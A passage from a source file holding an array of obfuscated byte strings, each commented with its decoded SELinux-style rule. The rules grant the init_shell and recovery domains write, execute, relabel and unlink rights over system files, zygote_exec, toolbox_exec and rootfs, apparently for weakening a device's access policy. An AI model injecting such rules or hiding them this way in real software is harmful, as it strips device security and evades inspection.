    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init_shell:app_data_file:file:unlink"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init_shell:app_data_file:file:open"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init_shell:app_data_file:file:read"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:app_data_file:file:write"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:app_data_file:file:getattr"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:app_data_file:file:setattr"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init_shell:app_data_file:file:execute"
    "\x63\x53\x04\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init_shell:app_data_file:file:execute_no_trans"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:app_data_file:file:relabelfrom"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x06\x35\x35\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:app_data_file:file:relabelto"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init_shell:shell_data_file:file:create"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init_shell:shell_data_file:file:unlink"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init_shell:shell_data_file:file:open"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init_shell:shell_data_file:file:read"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:shell_data_file:file:write"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:shell_data_file:file:getattr"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:shell_data_file:file:setattr"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init_shell:shell_data_file:file:execute"
    "\x63\x53\x06\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init_shell:shell_data_file:file:execute_no_trans"
    "\x63\x53\x01\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:shell_data_file:file:relabelfrom"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x30\x0d\x0a\x31\x31\xdc\x09\x06\x39\x06\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:shell_data_file:file:relabelto"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init_shell:lnk_file:file:create"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init_shell:lnk_file:file:unlink"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init_shell:lnk_file:file:open"
    "\x63\x53\x13\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init_shell:lnk_file:file:read"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:lnk_file:file:write"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:lnk_file:file:getattr"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:lnk_file:file:setattr"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init_shell:lnk_file:file:execute"
    "\x63\x53\x1f\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init_shell:lnk_file:file:execute_no_trans"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:lnk_file:file:relabelfrom"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x31\x33\x08\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:lnk_file:file:relabelto"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init_shell:zygote_exec:file:create"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init_shell:zygote_exec:file:unlink"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init_shell:zygote_exec:file:open"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init_shell:zygote_exec:file:read"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:zygote_exec:file:write"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:zygote_exec:file:getattr"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:zygote_exec:file:setattr"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init_shell:zygote_exec:file:execute"
    "\x63\x53\x02\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init_shell:zygote_exec:file:execute_no_trans"
    "\x63\x53\x1d\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:zygote_exec:file:relabelfrom"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x3f\x3e\x04\x0c\x39\x0a\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:zygote_exec:file:relabelto"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:init_shell:toolbox_exec:file:create"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:init_shell:toolbox_exec:file:unlink"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:init_shell:toolbox_exec:file:open"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:init_shell:toolbox_exec:file:read"
    "\x63\x53\x18\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:init_shell:toolbox_exec:file:write"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:toolbox_exec:file:getattr"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:init_shell:toolbox_exec:file:setattr"
    "\x63\x53\x1a\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:init_shell:toolbox_exec:file:execute"
    "\x63\x53\x03\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:init_shell:toolbox_exec:file:execute_no_trans"
    "\x63\x53\x1e\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:init_shell:toolbox_exec:file:relabelfrom"
    "\x63\x53\x1c\x06\x31\x31\x0c\x34\xff\x0e\x33\x0e\x39\xdc\x30\x0d\x0a\x31\x31\xff\x39\x0c\x0c\x31\x07\x0c\x3d\xdc\x0a\x3d\x0a\x00\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:init_shell:toolbox_exec:file:relabelto"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:recovery:fuse:file:create"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:recovery:fuse:file:unlink"
    "\x63\x53\x2d\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:recovery:fuse:file:open"
    "\x63\x53\x2d\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:recovery:fuse:file:read"
    "\x63\x53\x2e\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:fuse:file:write"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:fuse:file:getattr"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:fuse:file:setattr"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:recovery:fuse:file:execute"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:recovery:fuse:file:execute_no_trans"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:fuse:file:relabelfrom"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x0b\x3a\x30\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:fuse:file:relabelto"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:recovery:rootfs:file:create"
    "\x63\x53\x11\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:recovery:rootfs:file:unlink"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:recovery:rootfs:file:open"
    "\x63\x53\x2f\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:recovery:rootfs:file:read"
    "\x63\x53\x10\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:rootfs:file:write"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:rootfs:file:getattr"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:rootfs:file:setattr"
    "\x63\x53\x12\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:recovery:rootfs:file:execute"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:recovery:rootfs:file:execute_no_trans"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:rootfs:file:relabelfrom"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x37\x0c\x0c\x39\x0b\x30\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:rootfs:file:relabelto"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x00\x37\x0a\x06\x39\x0a", // "allow:recovery:system_file:file:create"
    "\x63\x53\x16\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x3a\x33\x31\x0e\x33\x08", // "allow:recovery:system_file:file:unlink"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0c\x35\x0a\x33", // "allow:recovery:system_file:file:open"
    "\x63\x53\x14\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x06\x09", // "allow:recovery:system_file:file:read"
    "\x63\x53\x15\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x34\x37\x0e\x39\x0a", // "allow:recovery:system_file:file:write"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x04\x0a\x39\x06\x39\x39\x37", // "allow:recovery:system_file:file:getattr"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x30\x0a\x39\x06\x39\x39\x37", // "allow:recovery:system_file:file:setattr"
    "\x63\x53\x17\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a", // "allow:recovery:system_file:file:execute"
    "\x63\x53\x00\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x0a\x3d\x0a\x00\x3a\x39\x0a\xdc\x33\x0c\xdc\x39\x37\x06\x33\x30", // "allow:recovery:system_file:file:execute_no_trans"
    "\x63\x53\x1b\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x0b\x37\x0c\x32", // "allow:recovery:system_file:file:relabelfrom"
    "\x63\x53\x19\x06\x31\x31\x0c\x34\xff\x37\x0a\x00\x0c\x3b\x0a\x37\x3e\xff\x30\x3e\x30\x39\x0a\x32\xdc\x0b\x0e\x31\x0a\xff\x0b\x0e\x31\x0a\xff\x37\x0a\x31\x06\x07\x0a\x31\x39\x0c", // "allow:recovery:system_file:file:relabelto"
